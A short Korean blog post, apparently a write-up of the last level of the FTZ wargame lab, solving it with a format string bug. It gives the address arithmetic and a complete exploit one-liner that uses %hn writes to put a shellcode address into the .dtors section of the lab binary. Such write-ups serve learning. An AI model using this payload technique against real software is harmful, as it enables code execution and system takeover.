http://proneer.tistory.com/entry/FormatString-%ED%8F%AC%EB%A7%B7%EC%8A%A4%ED%8A%B8%EB%A7%81Format-String-Attack
이곳을 참조해서 공부하였습니당
마지막문제이다. bleh라는 배열을 80바이트 선언해주고 있다. 또한 79바이트 이하로만 입력받고 있다.
bof를 시도해봤지만 bof도 통하지 않는다. 이 문제를 풀려면 "포멧스트링버그"를 이용해서 풀어야 한다.
설명은 생략하고 위의 문서를 첨부하였다.
dtors를 구하고, 08049594+4에 쉘코드를 넣으면 된다.
또한 쉘코드 주소를 2바이트씩 나눠 10진수로 저장한다
>>> 0xfdda-8
64978
>>> 0xbfff - 0xfdda
-15835
>>> 0x1bfff-0xfdda
49701
(python -c 'print "\x98\x95\x04\x08\x9a\x95\x04\x08%64978x%4$hn%49701x%5$hn"' ; cat) | ./attackme
Flag : i will come in a minute
'IT > FTZ' 카테고리의 다른 글
| [FTZ] level19 (0) | 2016.07.10 |
|---|---|
| [FTZ] level18 (0) | 2016.07.10 |
| [FTZ] level17 (0) | 2016.07.10 |
| [FTZ] level16 (0) | 2016.07.10 |
| [FTZ] level15 (0) | 2016.07.10 |